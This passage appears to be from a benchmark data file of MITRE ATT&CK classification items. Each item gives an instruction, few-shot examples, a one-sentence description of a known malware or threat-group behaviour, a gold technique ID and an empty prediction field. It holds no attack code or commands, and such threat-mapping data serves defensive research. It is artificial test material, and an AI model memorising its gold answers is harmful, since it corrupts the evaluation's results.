it can easily elevate in the future.", + "gold": "- T1548.001: Abuse Elevation Control Mechanism - Setuid and Setgid", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Chimera has used Cobalt Strike C2 beacons for data exfiltration.\n\t - T1041: Exfiltration Over C2 Channel\n- Text: CosmicDuke exfiltrates collected files automatically over FTP to remote servers.\n\t - T1020: Automated Exfiltration\n- Text: Lazarus Group malware SierraBravo-Two generates an email message via SMTP containing information about newly infected victims.\n\t - T1048.003: Exfiltration Over Alternative Protocol - Exfiltration Over Unencrypted Non-C2 Protocol\n", + "input": "Chrommme can exfiltrate collected data via C2.", + "gold": "- T1041: Exfiltration Over C2 Channel", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: ZIRCONIUM has used Dropbox for C2 allowing upload and download of files as well as execution of arbitrary commands.\n\t - T1102.002: Web Service - Bidirectional Communication\n- Text: APT29 has embedded an ISO file within an HTML attachment that contained JavaScript code to initiate malware execution.\n\t - T1027.006: Obfuscated Files or Information - HTML Smuggling\n- Text: LazyScripter has used JavaScript in its attacks.\n\t - T1059.007: Command and Scripting Interpreter - JavaScript\n", + "input": "Bad Rabbit spread through watering holes on popular sites by injecting JavaScript into the HTML body or a \".js\" file.", + "gold": "- T1189: Drive-by Compromise", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: When initially executed, the malware will check its current working directory. Should it not match the expected path, Cardinal will enter its installation routine. Cardinal RAT will copy itself to a randomly named executable in the specified directory. It will then compile and execute embedded source code that contains watchdog functionality. Specifically, this newly spawned executable will ensure that the following registry key is set\n\t - T1027.004: Obfuscated Files or Information - Compile After Delivery\n\t - T1012: Query Registry\n\t - T1083: File and Directory Discovery\n- Text: probes the system to check for sandbox/virtualized environments and other antimalware processes.\n\t - T1518.001: Software Discovery - Security Software Discovery\n- Text: Hard Disk Check The Trojan will perform the following WMI query: Select * from Win32_DiskDrive The Trojan will check the Caption and Model fields in the results for the strings Virtual, VMWare, VM, VBox or Oracle\n\t - T1497.001: Virtualization/Sandbox Evasion - System Checks\n\t - T1497: Virtualization/Sandbox Evasion\n", + "input": "Azorult can check for installed software on the system under the Registry key \"Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\".", + "gold": "- T1012: Query Registry", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The user receives a phishing email with a ZIP attachment containing an Office document with embedded macros, the document itself or a link to download malicious document. The user opens the malicious attachment/link and is tricked into clicking \u201cEnable content\u201d. - A malicious macro is executed. One of the encrypted resources has the DLL binary (loader) which is decrypted later during runtime\n\t - T1204.001: User Execution - Malicious Link\n\t - T1204.002: User Execution - Malicious File\n- Text: Executive summary . The PROMETHIUM threat actor \u2014 active since 2012 \u2014 has been exposed multiple times over the past several years.. However, this has not deterred this actor from continuing and expanding their activities. The trojanized setup will install the malware and the legitimate application, which is a good way to disguise its activities. PROMETHIUM has been resilient over the years. We have no evidence that the websites of the real applications were compromised to host the malicious installer. The usage of the HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run registry key has a persistence mechanism that has been replaced by the creation of a service. If it is executed with the \"help\" parameter, it will install a service to execute itself as a service. This has a notable side effect: if rmaserv.exe is executed isolated on a sandbox (so without the parameter), the service is not created. Document search module: Mssqldbserv.xml . This module has been described before in the article here. The purpose of this tool is to parse the hard drive for files with a specific extension and create an archive with these files. SFT file creation routine Using the working directory as a base path, which in this sample case is C:\\DOCUME~1\\<USER>~1\\LOCALS~1\\Temp\\4CA-B25C11-A27BC\\, each selected file will be compressed into the file kr.zp\n\t - T1204.002: User Execution - Malicious File\n- Text: Confucius has sent malicious links to victims through email campaigns.\n\t - T1566.002: Phishing - Spearphishing Link\n", + "input": "GuLoader has relied upon users clicking on links to malicious documents.", + "gold": "- T1204.001: User Execution - Malicious Link", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT38 has used VBScript to execute commands and other operational tasks.\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n- Text: has used Windows DDE for execution of commands and a malicious VBS.\n\t - T1559.002: Inter-Process Communication - Dynamic Data Exchange\n- Text: PoetRAT has used spearphishing attachments to infect victims.\n\t - T1204.002: User Execution - Malicious File\n", + "input": "PoetRAT has used Word documents with VBScripts to execute malicious activities.", + "gold": "- T1059.005: Command and Scripting Interpreter - Visual Basic", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: SDBbot has the ability to decrypt and decompress its payload to enable code execution.\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: In February 2013, AlienVault performed analysis on the CallMe Trojan and found that it is based on a tool called Tiny SHell, an OSX shell tool whose source code is available on the Internet. The Trojan uses AES to encrypt the communication channel its C2 server, which will provide one of three commands to carry out activities on the compromised system, as seen in Table 4\n\t - T1059.004: Command and Scripting Interpreter - Unix Shell\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n- Text: Tonto Team is an APT group active since at least 2009 and targeting governments and institutions mostly based in Russia, Japan and Mongolia. For more than ten years, Tonto Team has been using the Bisonal RAT. Tonto Team is one of the APT groups that now has access to the ShadowPad backdoor\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n\t - T1505.003: Server Software Component - Web Shell\n\t - T1105: Ingress Tool Transfer\n", + "input": "Frankenstein has deobfuscated base64-encoded commands following the execution of a malicious script, which revealed a small script designed to obtain an additional payload.", + "gold": "- T1140: Deobfuscate/Decode Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Part of 's operation involved using modules to copy itself to air-gapped machines and using files written to USB sticks to transfer data and command traffic.\n\t - T1091: Replication Through Removable Media\n- Text: This data theft module appears to have been compiled in May 2015 and is designed to watch removable drives and collect files from them, depending on a set of rules defined by the attackers. The stolen data is copied into a hidden directory as \u201c%MYPICTURES%\\%volume serial number%\u201c, from where it can be exfiltrated by the attackers using one of the AZZY implants\n\t - T1074.001: Data Staged - Local Data Staging\n\t - T1025: Data from Removable Media\n- Text: Equation has used tools with the functionality to search for specific information about the attached hard drive that could be used to identify and overwrite the firmware.\n\t - T1120: Peripheral Device Discovery\n", + "input": "Unknown Logger is capable of spreading to USB devices.", + "gold": "- T1091: Replication Through Removable Media", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The cheat sheet is separated into several sections, based on the purpose of the example commands. Fortunately, the commands listed in the cheat sheet provides us with a great deal of insight into some of the tools and techniques the actors will possibly use after compromising the end system. The cheat sheet shows significant batch and PowerShell scripting and a preference for using RDP, as well as the following tools not provided natively in Windows (i.e. thc-hydra, Plink, Mimikatz, Powercat, ProcDump, SharpHound/BloodHound and PowerSploit). Table 1 shows the headers and a description of each section within the cheat sheet.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: Kimsuky is a highly motivated threat actor targeting a number of entities in South Korea. This group has been relentlessly creating new infection chains to deliver different types of malware to their victims. This campaign relies on the abuse of Blogspot to host attacker-operated blogs serving malicious VB based scripts to their targets. We've found preliminary malicious components from initial access beacons to file exfiltrators being deployed to victims. In many cases, the content of these preliminary components was combined to serve special scripts to victims.The final implants utilized by the actors in this campaign are derivatives of the Gold Dragon/Brave Prince malware families. Such targeted attacks can result in the leak of restricted research, unauthorized access for espionage and even destructive attacks against target organizations\n\t - T1608.001: Stage Capabilities - Upload Malware\n- Text: During C0015, the threat actors downloaded additional tools and files onto a compromised network.\n\t - T1105: Ingress Tool Transfer\n", + "input": "Lazarus Group has used Powershell to download malicious payloads.", + "gold": "- T1059.001: Command and Scripting Interpreter - PowerShell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: has the capability to retrieve information about shares on remote hosts.\n\t - T1135: Network Share Discovery\n- Text: UNC2452 used the \"Get-ManagementRoleAssignment\" PowerShell cmdlet to enumerate Exchange management role assignments through an Exchange Management Shell.\n\t - T1069: Permission Groups Discovery\n- Text: Pony has used the \"NetUserEnum\" function to enumerate local accounts.\n\t - T1087.001: Account Discovery - Local Account\n", + "input": "MURKYTOP has the capability to retrieve information about shares on remote hosts.", + "gold": "- T1135: Network Share Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: IcedID\u2019s operators probably plan on targeting businesses because they added a network propagation module to the malware from the get-go. IcedID possesses the ability to move to other endpoints, and X-Force researchers also observed it infecting terminal servers\n\t - T1087.003: Account Discovery - Email Account\n- Text: OSInfo enumerates local and domain users\n\t - T1087.001: Account Discovery - Local Account\n\t - T1087.002: Account Discovery - Domain Account\n- Text: XCSSET uses \"scp\" to access the \"~/Library/Cookies/Cookies.binarycookies\" file.\n\t - T1539: Steal Web Session Cookie\n", + "input": "InvisiMole lists local users and session information.", + "gold": "- T1033: System Owner/User Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: PoshC2 contains modules for local privilege escalation exploits such as CVE-2016-9192 and CVE-2016-0099.\n\t - T1068: Exploitation for Privilege Escalation\n- Text: The main functionality of the macros remained the same as in a previous APT34 campaign: The malicious macros use the MouseAvailable function for evasion, and create a scheduled task to execute a payload embedded within the document\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n- Text: at can be used to schedule a task on a system to be executed at a specific date or time.\n\t - T1053.002: Scheduled Task/Job - At\n", + "input": "Stuxnet used MS10-073 and an undisclosed Task Scheduler vulnerability to escalate privileges on local Windows machines.", + "gold": "- T1068: Exploitation for Privilege Escalation", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: On October 28, we observed APT3 sending out spearphishing messages containing a compressed executable attachment. The deflated exe was a variant of the same downloader described above and connected to 198.55.115.71 over port 1913 via SOCKS5 proxy. The secondary payload in that case was detected as Backdoor.APT.CookieCutter (aka Pirpi) and also named newnotepad.exe (MD5 8849538ef1c3471640230605c2623c67) and connected to the known APT3 domains\n\t - T1090.002: Proxy - External Proxy\n\t - T1095: Non-Application Layer Protocol\n- Text: GravityRAT has used HTTP over a non-standard port, such as TCP port 46769.\n\t - T1571: Non-Standard Port\n- Text: uses a large list of C2 servers that it cycles through until a successful connection is established.\n\t - T1008: Fallback Channels\n", + "input": "WarzoneRAT can communicate with its C2 server via TCP over port 5200.", + "gold": "- T1095: Non-Application Layer Protocol", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT29 has use `mshta` to execute malicious scripts on a compromised host.\n\t - T1218.005: System Binary Proxy Execution - Mshta\n- Text: Rundll32.exe is used as a way of executing Flame at the command-line.\n\t - T1218.011: System Binary Proxy Execution - Rundll32\n- Text: MechaFlounder uses a python-based payload.\n\t - T1059.006: Command and Scripting Interpreter - Python\n", + "input": "APT29 has used \"Rundll32.exe\" to execute payloads.", + "gold": "- T1218.011: System Binary Proxy Execution - Rundll32", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Cisco Talos has observed another malware campaign that utilizes malicious Microsoft Office documents (maldocs) to spread the remote access trojan (RAT) ObliqueRAT. ObliqueRAT has been linked to the Transparent Tribe APT group in the past\n\t - T1566.001: Phishing - Spearphishing Attachment\n\t - T1566.002: Phishing - Spearphishing Link\n- Text: OutSteel has been distributed through malicious links contained within spearphishing emails.\n\t - T1566.002: Phishing - Spearphishing Link\n- Text: RTM has attempted to lure victims into opening e-mail attachments to execute malicious code.\n\t - T1204.002: User Execution - Malicious File\n", + "input": "NETWIRE has been spread via e-mail campaigns utilizing malicious attachments.", + "gold": "- T1566.001: Phishing - Spearphishing Attachment", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Chimera has used direct Windows system calls by leveraging Dumpert.\n\t - T1106: Native API\n- Text: gh0st RAT can load DLLs into memory.\n\t - T1129: Shared Modules\n- Text: SslMM contains a feature to manipulate process privileges and tokens.\n\t - T1134: Access Token Manipulation\n", + "input": "gh0st RAT has used the `InterlockedExchange`, `SeShutdownPrivilege`, and `ExitWindowsEx` Windows API functions.", + "gold": "- T1106: Native API", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: xCaon has checked for the existence of Kaspersky antivirus software on the system.\n\t - T1518.001: Software Discovery - Security Software Discovery\n- Text: Gelsemium can enumerate running processes.\n\t - T1057: Process Discovery\n- Text: UBoatRAT checks for virtualization software such as VMWare, VirtualBox, or QEmu on the compromised machine.\n\t - T1497.001: Virtualization/Sandbox Evasion - System Checks\n", + "input": "Bumblebee can identify processes associated with analytical tools.", + "gold": "- T1057: Process Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: MuddyWater has used malware that has the capability to execute malicious code via COM, DCOM, and Outlook.\n\t - T1559.001: Inter-Process Communication - Component Object Model\n- Text: PowerSploit's \"New-UserPersistenceOption\" Persistence argument can be used to establish via a Scheduled Task/Job.\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n- Text: has used COM hijacking for persistence by replacing the legitimate MMDeviceEnumerator object with a payload.\n\t - T1546.015: Event Triggered Execution - Component Object Model Hijacking\n", + "input": "Milan can use a COM component to generate scheduled tasks.", + "gold": "- T1559.001: Inter-Process Communication - Component Object Model", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: GravityRAT has used HTTP over a non-standard port, such as TCP port 46769.\n\t - T1571: Non-Standard Port\n- Text: BUBBLEWRAP is a full-featured backdoor that is set to run when the system boots, and can communicate using HTTP, HTTPS, or a SOCKS proxy\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: Okrum mimics HTTP protocol for C2 communication, while hiding the actual messages in the Cookie and Set-Cookie headers of the HTTP requests.\n\t - T1001.003: Data Obfuscation - Protocol Impersonation\n", + "input": "WIRTE has used HTTP for network communication.", + "gold": "- T1071.001: Application Layer Protocol - Web Protocols", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The folder C:\\Users\\Public\\Administrador\\logs\\ is created to store screenshots, as well as the number of mouse clicks the user has triggered while browsing the banking sites (Figure 12). The screenshots are continuously saved as .jpg images\n\t - T1119: Automated Collection\n- Text: VERMIN encrypts the collected files using 3-DES.\n\t - T1560: Archive Collected Data\n- Text: Calisto uses the \"zip -r\" command to compress the data collected on the local system.\n\t - T1560.001: Archive Collected Data - Archive via Utility\n", + "input": "NETWIRE can automatically archive collected data.", + "gold": "- T1119: Automated Collection", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: SUNBURST collected hostname, OS version, and device uptime.\n\t - T1082: System Information Discovery\n- Text: has commands to get the time the machine was built, the time, and the time zone.\n\t - T1124: System Time Discovery\n- Text: No matching sample found for T1546.016\n", + "input": "T9000 gathers and beacons the operating system build number and CPU Architecture (32-bit/64-bit) during installation.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Pupy can user PowerView to execute \u201cnet user\u201d commands and create local system accounts.\n\t - T1136.001: Create Account - Local Account\n- Text: Nyetya requires user credentials to spread itself laterally via the PsExec and WMI vectors (which are detailed in the \"Malware Functionality\" section). Talos has identified three ways Nyetya can obtain these credentials. First, credentials can be manually passed in via a command line argument\n\t - T1078.003: Valid Accounts - Local Accounts\n- Text: FIN4 has used legitimate credentials to hijack email communications.\n\t - T1078: Valid Accounts\n", + "input": "HiddenWasp creates a user account as a means to provide initial persistence to the compromised machine.", + "gold": "- T1136.001: Create Account - Local Account", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Maze has communicated to hard-coded IP addresses via HTTP.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: The DNS resolution is performed using DNS over HTTPS (DoH). The malware sends an HTTP POST request to a Google DNS Server (8.8.8.8) using the following headers\n\t - T1572: Protocol Tunneling\n- Text: Some malware uses a list of ordered port numbers to choose a port for C2 traffic, which includes uncommonly used ports such as 995, 1816, 465, 1521, 3306, and many others.\n\t - T1571: Non-Standard Port\n", + "input": "One variant of CloudDuke uses HTTP and HTTPS for C2.", + "gold": "- T1071.001: Application Layer Protocol - Web Protocols", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Empire has the ability to automatically send collected data back to the threat actors' C2.\n\t - T1020: Automated Exfiltration\n- Text: Micropsia executes an RAR tool to recursively archive files based on a predefined list of file extensions (*.xls, *.xlsx, *.csv, *.odt, *.doc, *.docx, *.ppt, *.pptx, *.pdf, *.mdb, *.accdb, *.accde, *.txt).\n\t - T1119: Automated Collection\n- Text: Remsec contains a module to move data from airgapped networks to Internet-connected systems by using a removable USB device.\n\t - T1052.001: Exfiltration Over Physical Medium - Exfiltration over USB\n", + "input": "Tropic Trooper has collected information automatically using the adversary's USBferry attack.", + "gold": "- T1119: Automated Collection", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The malware continues by creating a service named mssecsvc2.0 with a binary path pointing to the running module with the arguments \"-m security\". Once created, the malware starts the service\n\t - T1543.003: Create or Modify System Process - Windows Service\n- Text: Trickbot is installed as a scheduled task, using names like \u201cWinDotNet,\u201d \u201cGoogleTask,\u201d or \u201cSysnetsf\u201d to masquerade as legitimate-appearing processes. These point to various copies of TrickBot installed in the system, usually within the user profile under %USER_DIR%\\AppData\\Roaming\\ or a subdirectory. The subdirectories also use similarly misleading names like \u201cWinDefrag\u201d or \u201cNetSocket\u201d to appear innocuous. TrickBot may also be installed as a service with names like \u201cControlServiceA\u201d that points to a copy in the system drive root\n\t - T1543.003: Create or Modify System Process - Windows Service\n\t - T1036.004: Masquerading - Masquerade Task or Service\n- Text: creates a scheduled task to run itself every three minutes.\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n", + "input": "Kwampirs creates a new service named WmiApSrvEx to establish persistence.", + "gold": "- T1543.003: Create or Modify System Process - Windows Service", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Kevin has renamed an image of `cmd.exe` with a random name followed by a `.tmpl` extension.\n\t - T1036.003: Masquerading - Rename System Utilities\n- Text: puts a space after a false .jpg extension so that execution actually goes through the Terminal.app program.\n\t - T1036.006: Masquerading - Space after Filename\n- Text: 1) Moving the (malicious) application into the /Users/user/Library/ directory 2) Executing this persisted copy, via the open command 3) Decrypting embedded strings that relate to file extensions of (likely) interest\n\t - T1036: Masquerading\n", + "input": "Kevin can use a renamed image of `cmd.exe` for execution.", + "gold": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Linux malware detection and prevention is not prevalent at this time, but Palo Alto Networks customers are protected through our next-generation security platform: IPS signature 14917 deployed to identify and prevent command and control activity The C2 domains and files mentioned in this report are blocked in our Threat Prevention product\n\t - T1070.004: Indicator Removal - File Deletion\n- Text: Wiarp creates a backdoor through which remote attackers can open a command line interface.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: During Frankenstein, the threat actors used WMI queries to check if various security applications were running as well as to determine the operating system version.\n\t - T1047: Windows Management Instrumentation\n", + "input": "OopsIE has the capability to delete files and scripts from the victim's machine.", + "gold": "- T1070.004: Indicator Removal - File Deletion", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert 